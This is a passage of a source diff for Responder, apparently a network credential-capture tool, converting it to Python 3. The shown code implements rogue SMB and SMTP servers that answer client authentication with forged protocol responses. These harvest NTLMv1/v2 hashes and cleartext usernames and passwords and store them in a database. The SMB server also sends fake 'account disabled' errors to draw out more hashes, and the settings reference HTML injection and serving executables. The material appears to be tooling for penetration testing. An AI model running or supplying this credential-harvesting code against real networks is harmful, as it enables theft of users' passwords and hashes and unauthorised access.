-		UserLen      = struct.unpack('<H',data[117:119])[0]
-		UserOffset   = struct.unpack('<H',data[119:121])[0]
-		Username     = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
-		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, SMBHash[:32], SMBHash[32:])
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
 
 		SaveToDb({
 			'module': 'SMB', 
@@ -145,43 +136,17 @@ def ParseSMBHash(data,client):  #Parse SMB NTLMSSP v1/v2
 			'fullhash': WriteHash,
 		})
 
-
-def ParseSMB2NTLMv2Hash(data,client):  #Parse SMB NTLMv2
-    SSPIStart = data[113:]
-    data = data[113:]
-    LMhashLen = struct.unpack('<H',data[12:14])[0]
-    LMhashOffset = struct.unpack('<H',data[16:18])[0]
-    LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-    NthashLen = struct.unpack('<H',data[22:24])[0]
-    NthashOffset = struct.unpack('<H',data[24:26])[0]
-    SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-    DomainLen = struct.unpack('<H',data[30:32])[0]
-    DomainOffset = struct.unpack('<H',data[32:34])[0]
-    Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
-    UserLen      = struct.unpack('<H',data[38:40])[0]
-    UserOffset   = struct.unpack('<H',data[40:42])[0]
-    Username     = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
-    WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, SMBHash[:32], SMBHash[32:])
-    SaveToDb({
-                'module': 'SMBv2', 
-		'type': 'NTLMv2-SSP', 
-		'client': client, 
-		'user': Domain+'\\'+Username, 
-		'hash': SMBHash, 
-		'fullhash': WriteHash,
-             })
-
-def ParseLMNTHash(data, client):  # Parse SMB NTLMv1/v2
+def ParseLMNTHash(data, client, Challenge):  # Parse SMB NTLMv1/v2
 	LMhashLen = struct.unpack('<H',data[51:53])[0]
 	NthashLen = struct.unpack('<H',data[53:55])[0]
 	Bcc = struct.unpack('<H',data[63:65])[0]
-	Username, Domain = tuple([e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]])
+	Username, Domain = tuple([e.decode('latin-1') for e in data[89+NthashLen:Bcc+60].split(b'\x00\x00\x00')[:2]])
 
 	if NthashLen > 25:
-		FullHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex')
+		FullHash = codecs.encode(data[65+LMhashLen:65+LMhashLen+NthashLen],'hex')
 		LmHash = FullHash[:32].upper()
 		NtHash = FullHash[32:].upper()
-		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, LmHash, NtHash)
+		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), LmHash.decode('latin-1'), NtHash.decode('latin-1'))
 	
 		SaveToDb({
 			'module': 'SMB', 
@@ -193,10 +158,9 @@ def ParseLMNTHash(data, client):  # Parse SMB NTLMv1/v2
 		})
 
 	if NthashLen == 24:
-		NtHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
-		LmHash = data[65:65+LMhashLen].encode('hex').upper()
-		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash, NtHash, settings.Config.NumChal)
-
+		NtHash = codecs.encode(data[65+LMhashLen:65+LMhashLen+NthashLen],'hex').upper()
+		LmHash = codecs.encode(data[65:65+LMhashLen],'hex').upper()
+		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash.decode('latin-1'), NtHash.decode('latin-1'), codecs.encode(Challenge,'hex').decode('latin-1'))
 		SaveToDb({
 			'module': 'SMB', 
 			'type': 'NTLMv1', 
@@ -220,7 +184,7 @@ def IsNT4ClearTxt(data, client):
 			if PassLen > 2:
 				Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
 				User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
-				print text("[SMB] Clear Text Credentials: %s:%s" % (User,Password))
+				print(text("[SMB] Clear Text Credentials: %s:%s" % (User,Password)))
 				WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password)
 
 
@@ -231,6 +195,7 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
 			while True:
 				data = self.request.recv(1024)
 				self.request.settimeout(1)
+				Challenge = RandomChallenge()
 
 				if not data:
 					break
@@ -241,168 +206,127 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
 						self.request.send(Buffer)
 						data = self.request.recv(1024)
 					except:
+						raise
 						pass
 
-
                                 ##Negotiate proto answer SMBv2.
-				if data[8:10] == "\x72\x00" and re.search("SMB 2.\?\?\?", data):
-              				head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00")
-            				t = SMB2NegoAns()
-         				t.calculate()
-        				packet1 = str(head)+str(t)
-       				        buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1  
-      				        self.request.send(buffer1)
-      				        data = self.request.recv(1024)
-                                ## Session Setup 1 answer SMBv2.
-				if data[16:18] == "\x00\x00" and data[4:5] == "\xfe":
-              				head = SMB2Header(MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data))
-              				t = SMB2NegoAns(Dialect="\x10\x02")
-              				t.calculate()
-              				packet1 = str(head)+str(t)
-       				        buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1  
-              				self.request.send(buffer1)
-              				data = self.request.recv(1024)
-                                ## Session Setup 2 answer SMBv2.
-				if data[16:18] == "\x01\x00" and data[4:5] == "\xfe":
-              				head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), SessionID=GrabSessionID(data),NTStatus="\x16\x00\x00\xc0")
-              				t = SMB2Session1Data()
-              				t.calculate()
-              				packet1 = str(head)+str(t)
-       				        buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1  
-              				self.request.send(buffer1)
-              				data = self.request.recv(1024)
-                                ## Session Setup 3 answer SMBv2.
-				if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x02" and data[4:5] == "\xfe":
-              				ParseSMB2NTLMv2Hash(data, self.client_address[0])
-              				head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data))
-              				t = SMB2Session2Data()
-              				packet1 = str(head)+str(t)
-       				        buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1  
-              				self.request.send(buffer1)
-              				data = self.request.recv(1024)
-
-                                # Negotiate Protocol Response smbv1
-				if data[8:10] == "\x72\x00" and data[4:5] == "\xff" and re.search("SMB 2.\?\?\?", data) == None:
-				        Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
-					Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
-					Body.calculate()
-		
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-
-					self.request.send(Buffer)
+				if data[8:10] == b"\x72\x00" and re.search(b"SMB 2.\?\?\?", data):
+					head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00")
+					t = SMB2NegoAns()
+					t.calculate()
+					packet1 = str(head)+str(t)
+					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
+					self.request.send(NetworkSendBufferPython2or3(buffer1))
 					data = self.request.recv(1024)
 
-				if data[8:10] == "\x73\x00" and data[4:5] == "\xff":  # Session Setup AndX Request smbv1
+                                ## Session Setup 1 answer SMBv2.
+				if data[16:18] == b"\x00\x00" and data[4:5] == b"\xfe":
+					head = SMB2Header(MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'))
+					t = SMB2NegoAns(Dialect="\x10\x02")
+					t.calculate()
+					packet1 = str(head)+str(t)
+					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
+					self.request.send(NetworkSendBufferPython2or3(buffer1))
+					data = self.request.recv(1024)
+                                ## Session Setup 2 answer SMBv2.
+				if data[16:18] == b"\x01\x00" and data[4:5] == b"\xfe":
+					head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), SessionID=GrabSessionID(data).decode('latin-1'),NTStatus="\x16\x00\x00\xc0")
+					t = SMB2Session1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					t.calculate()
+					packet1 = str(head)+str(t)
+					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
+					self.request.send(NetworkSendBufferPython2or3(buffer1))
+					data = self.request.recv(1024)
+                                ## Session Setup 3 answer SMBv2.
+				if data[16:18] == b'\x01\x00' and GrabMessageID(data)[0:1] == b'\x02' and data[4:5] == b'\xfe':
+					ParseSMBHash(data, self.client_address[0], Challenge)
+					head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data).decode('latin-1'))
+					t = SMB2Session2Data()
+					packet1 = str(head)+str(t)
+					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
+					self.request.send(NetworkSendBufferPython2or3(buffer1))
+					data = self.request.recv(1024)
+
+                                # Negotiate Protocol Response smbv1
+				if data[8:10] == b'\x72\x00' and data[4:5] == b'\xff' and re.search(b'SMB 2.\?\?\?', data) == None:
+					Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
+					Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)))
+					Body.calculate()
+		
+					packet1 = str(Header)+str(Body)
+					Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
+
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+					data = self.request.recv(1024)
+
+				if data[8:10] == b"\x73\x00" and data[4:5] == b"\xff":  # Session Setup AndX Request smbv1
 					IsNT4ClearTxt(data, self.client_address[0])
 					
 					# STATUS_MORE_PROCESSING_REQUIRED
-					Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
+					Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
-						Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge, NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH")
+						Body = SMBSession1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 					else:
-						Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge)
+						Body = SMBSession1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 					Body.calculate()
 		
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+					packet1 = str(Header)+str(Body)
+					Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
 
-					self.request.send(Buffer)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					data = self.request.recv(1024)
 
 
-					if data[8:10] == "\x73\x00" and data[4:5] == "\xff":  # STATUS_SUCCESS
+					if data[8:10] == b"\x73\x00" and data[4:5] == b"\xff":  # STATUS_SUCCESS
 						if Is_Anonymous(data):
-							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
+							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
 							Body = SMBSessEmpty()
 
-							Packet = str(Header)+str(Body)
-							Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+							packet1 = str(Header)+str(Body)
+							Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
 
-							self.request.send(Buffer)
+							self.request.send(NetworkSendBufferPython2or3(Buffer))
 
 						else:
 							# Parse NTLMSSP_AUTH packet
-							ParseSMBHash(data,self.client_address[0])
+							ParseSMBHash(data,self.client_address[0], Challenge)
 
 							if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
 								# Send ACCOUNT_DISABLED to get multiple hashes if there are any
-								Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
+								Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
 								Body = SMBSessEmpty()
 
-								Packet = str(Header)+str(Body)
-								Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+								packet1 = str(Header)+str(Body)
+								Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
 
-								self.request.send(Buffer)
+								self.request.send(NetworkSendBufferPython2or3(Buffer))
 								self.ntry += 1
 								continue
 
 							# Send STATUS_SUCCESS
-							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
 							Body = SMBSession2Accept()
 							Body.calculate()
 
-							Packet = str(Header)+str(Body)
-							Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+							packet1 = str(Header)+str(Body)
+							Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
 
-							self.request.send(Buffer)
+							self.request.send(NetworkSendBufferPython2or3(Buffer))
 							data = self.request.recv(1024)
 				
 
-				if data[8:10] == "\x75\x00" and data[4:5] == "\xff":  # Tree Connect AndX Request
+				if data[8:10] == b"\x75\x00" and data[4:5] == b"\xff":  # Tree Connect AndX Request
 					ParseShare(data)
-					Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
+					Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(NetworkRecvBufferPython2or3(data)), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					Body = SMBTreeData()
 					Body.calculate()
 
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+					packet1 = str(Header)+str(Body)
+					Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
 
-					self.request.send(Buffer)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					data = self.request.recv(1024)
-
-				if data[8:10] == "\x71\x00" and data[4:5] == "\xff":  #Tree Disconnect
-					Header = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x00\x00\x00"
-
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					
-					self.request.send(Buffer)
-					data = self.request.recv(1024)
-
-				if data[8:10] == "\xa2\x00" and data[4:5] == "\xff":  #NT_CREATE Access Denied.
-					Header = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x00\x00\x00"
-
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-
-					self.request.send(Buffer)
-					data = self.request.recv(1024)
-
-				if data[8:10] == "\x25\x00" and data[4:5] == "\xff":  # Trans2 Access Denied.
-					Header = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x00\x00\x00"
-
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-
-					self.request.send(Buffer)
-					data = self.request.recv(1024)
-				
-
-				if data[8:10] == "\x74\x00" and data[4:5] == "\xff":  # LogOff
-					Header = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x02\xff\x00\x27\x00\x00\x00"
-
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-
-					self.request.send(Buffer)
-					data = self.request.recv(1024)
-
-		except socket.error:
+		except:
 			pass
 
 
@@ -411,33 +335,33 @@ class SMB1LM(BaseRequestHandler):  # SMB Server class, old version
 		try:
 			self.request.settimeout(0.5)
 			data = self.request.recv(1024)
-
-			if data[0] == "\x81":  #session request 139
+			Challenge = RandomChallenge()
+			if data[0] == b"\x81":  #session request 139
 				Buffer = "\x82\x00\x00\x00"
-				self.request.send(Buffer)
+				self.request.send(NetworkSendBufferPython2or3(Buffer))
 				data = self.request.recv(1024)
 
-			if data[8:10] == "\x72\x00":  #Negotiate proto answer.
-				head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
-				Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=settings.Config.Challenge)
+			if data[8:10] == b"\x72\x00":  #Negotiate proto answer.
+				head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
+				Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)),Domain="",Key=NetworkRecvBufferPython2or3(Challenge))
 				Body.calculate()
 				Packet = str(head)+str(Body)
-				Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-				self.request.send(Buffer)
+				Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
+				self.request.send(NetworkSendBufferPython2or3(Buffer))
 				data = self.request.recv(1024)
 
-			if data[8:10] == "\x73\x00":  #Session Setup AndX Request
+			if data[8:10] == b"\x73\x00":  #Session Setup AndX Request
 				if Is_LMNT_Anonymous(data):
-					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					Packet = str(head)+str(SMBSessEmpty())
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					self.request.send(Buffer)
+					Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 				else:
-					ParseLMNTHash(data,self.client_address[0])
-					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+					ParseLMNTHash(data,self.client_address[0], Challenge)
+					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					Packet = str(head) + str(SMBSessEmpty())
-					Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
-					self.request.send(Buffer)
+					Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					data = self.request.recv(1024)
 		except Exception:
 			self.request.close()

servers/SMTP.py

@@ -16,38 +16,29 @@
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from utils import *
 from base64 import b64decode
-from SocketServer import BaseRequestHandler
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 from packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2
 
 class ESMTP(BaseRequestHandler):
 
 	def handle(self):
 		try:
-			self.request.send(str(SMTPGreeting()))
+			self.request.send(NetworkSendBufferPython2or3(SMTPGreeting()))
 			data = self.request.recv(1024)
 
-			if data[0:4] == "EHLO":
-				self.request.send(str(SMTPAUTH()))
+			if data[0:4] == b'EHLO' or data[0:4] == b'ehlo':
+				self.request.send(NetworkSendBufferPython2or3(SMTPAUTH()))
 				data = self.request.recv(1024)
 
-			if data[0:4] == "AUTH":
-				self.request.send(str(SMTPAUTH1()))
-				data = self.request.recv(1024)
-				
-				if data:
-					try:
-						User = filter(None, b64decode(data).split('\x00'))
-						Username = User[0]
-						Password = User[1]
-					except:
-						Username = b64decode(data)
-
-						self.request.send(str(SMTPAUTH2()))
-						data = self.request.recv(1024)
-
-						if data:
-							try: Password = b64decode(data)
-							except: Password = data
+			if data[0:4] == b'AUTH':
+				AuthPlain = re.findall(b'(?<=AUTH PLAIN )[^\r]*', data)
+				if AuthPlain:
+					User = list(filter(None, b64decode(AuthPlain[0]).split(b'\x00')))
+					Username = User[0].decode('latin-1')
+					Password = User[1].decode('latin-1')
 
 					SaveToDb({
 						'module': 'SMTP', 
@@ -56,7 +47,35 @@ class ESMTP(BaseRequestHandler):
 						'user': Username, 
 						'cleartext': Password, 
 						'fullhash': Username+":"+Password,
-					})
+						})
+
+				else:
+					self.request.send(NetworkSendBufferPython2or3(SMTPAUTH1()))
+					data = self.request.recv(1024)
+				
+					if data:
+						try:
+							User = list(filter(None, b64decode(data).split(b'\x00')))
+							Username = User[0].decode('latin-1')
+							Password = User[1].decode('latin-1')
+						except:
+							Username = b64decode(data).decode('latin-1')
+
+							self.request.send(NetworkSendBufferPython2or3(SMTPAUTH2()))
+							data = self.request.recv(1024)
+
+							if data:
+								try: Password = b64decode(data)
+								except: Password = data
+
+						SaveToDb({
+							'module': 'SMTP', 
+							'type': 'Cleartext', 
+							'client': self.client_address[0], 
+							'user': Username, 
+							'cleartext': Password, 
+							'fullhash': Username+":"+Password,
+						})
 
 		except Exception:
 			pass

settings.py

@@ -14,13 +14,16 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import utils
-import ConfigParser
+import utils, sys, random
+if (sys.version_info > (3, 0)):
+	import configparser as ConfigParser
+else:
+	import ConfigParser
 import subprocess
 
 from utils import *
 
-__version__ = 'Responder 2.3.1'
+__version__ = 'Responder 3.0.5.0'
 
 class Settings:
 	
@@ -66,9 +69,17 @@ class Settings:
 	def populate(self, options):
 
 		if options.Interface is None and utils.IsOsX() is False:
-			print utils.color("Error: -I <if> mandatory option is missing", 1)
+			print(utils.color("Error: -I <if> mandatory option is missing", 1))
 			sys.exit(-1)
 
+		if options.Interface == "ALL" and options.OURIP == None:
+			print(utils.color("Error: -i is missing.\nWhen using -I ALL you need to provide your current ip address", 1))
+			sys.exit(-1)
+		#Python version
+		if (sys.version_info > (3, 0)):
+			self.PY2OR3     = "PY3"
+		else:
+			self.PY2OR3	= "PY2"
 		# Config parsing
 		config = ConfigParser.ConfigParser()
 		config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))
@@ -84,6 +95,8 @@ class Settings:
 		self.SMTP_On_Off     = self.toBool(config.get('Responder Core', 'SMTP'))
 		self.LDAP_On_Off     = self.toBool(config.get('Responder Core', 'LDAP'))
 		self.DNS_On_Off      = self.toBool(config.get('Responder Core', 'DNS'))
+		self.RDP_On_Off      = self.toBool(config.get('Responder Core', 'RDP'))
+		self.DCERPC_On_Off      = self.toBool(config.get('Responder Core', 'DCERPC'))
 		self.Krb_On_Off      = self.toBool(config.get('Responder Core', 'Kerberos'))
 
 		# Db File
@@ -130,90 +143,139 @@ class Settings:
 		self.WPAD_Script      = config.get('HTTP Server', 'WPADScript')
 		self.HtmlToInject     = config.get('HTTP Server', 'HtmlToInject')
 
-		if not os.path.exists(self.Html_Filename):
-			print utils.color("/!\ Warning: %s: file not found" % self.Html_Filename, 3, 1)
+		if self.Serve_Exe is True:	
+			if not os.path.exists(self.Html_Filename):
+				print(utils.color("/!\ Warning: %s: file not found" % self.Html_Filename, 3, 1))
 
-		if not os.path.exists(self.Exe_Filename):
-			print utils.color("/!\ Warning: %s: file not found" % self.Exe_Filename, 3, 1)
+			if not os.path.exists(self.Exe_Filename):
+				print(utils.color("/!\ Warning: %s: file not found" % self.Exe_Filename, 3, 1))
 
 		# SSL Options
 		self.SSLKey  = config.get('HTTPS Server', 'SSLKey')
 		self.SSLCert = config.get('HTTPS Server', 'SSLCert')
 
 		# Respond to hosts
-		self.RespondTo         = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
-		self.RespondToName     = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')])
-		self.DontRespondTo     = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])
-		self.DontRespondToName = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')])
+		self.RespondTo         = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')]))
+		self.RespondToName     = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')]))
+		self.DontRespondTo     = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')]))
+		self.DontRespondToName = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')]))
 
+		#Generate Random stuff for one Responder session
+		self.MachineName       = 'WIN-'+''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(11)])
+		self.Domain            = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(4)])
+		self.DomainName        = self.Domain + '.LOCAL'
+		self.MachineNego       = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)]) +'$@'+self.DomainName
+		self.RPCPort           = random.randrange(45000, 49999)
 		# Auto Ignore List
-		self.AutoIgnore                 = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
-		self.CaptureMultipleCredentials = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))
-		self.AutoIgnoreList             = []
+		self.AutoIgnore                       = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
